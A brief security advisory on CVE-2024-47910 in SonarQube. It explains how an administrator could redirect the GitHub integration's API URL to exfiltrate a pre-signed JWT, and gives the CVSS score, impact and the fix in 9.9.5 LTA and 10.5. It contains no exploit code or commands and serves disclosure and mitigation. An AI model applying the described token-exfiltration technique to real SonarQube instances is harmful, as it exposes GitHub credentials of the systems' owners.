CVE-2024-47910: 
SonarQube vulnerability analysis and mitigation

A vulnerability was discovered in SonarSource SonarQube before versions 9.9.5 LTA and 10.x before 10.5, identified as CVE-2024-47910. The vulnerability allows a SonarQube user with Administrator role to modify an existing configuration of a GitHub integration to exfiltrate a pre-signed JWT. The issue was discovered by security researchers at Synacktiv on February 19, 2024, and was fixed in June 2024 (Sonar Community).

The vulnerability is related to improper access control (CWE-284) in the GitHub integration configuration. The issue allows administrators to modify the GitHub API URL configuration to potentially exfiltrate pre-signed JWT tokens. The vulnerability has been assigned a CVSS v3.1 base score of 7.2 (HIGH) with the vector string CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H (NVD).

If exploited, this vulnerability could lead to the exposure of sensitive authentication tokens (pre-signed JWT), potentially allowing unauthorized access to integrated GitHub resources. The impact is considered significant for affected systems, though it requires administrator privileges to exploit (Sonar Community).

The vulnerability has been fixed in SonarQube versions 9.9.5 LTA and 10.5, released on June 25, 2024. The fix involves forcing administrators to provide a Private Key for verification when modifying the GitHub API URL. Users are strongly advised to upgrade to these versions or later. Additional security patches are available in versions 9.9.6 LTA and 10.6 (Sonar Community).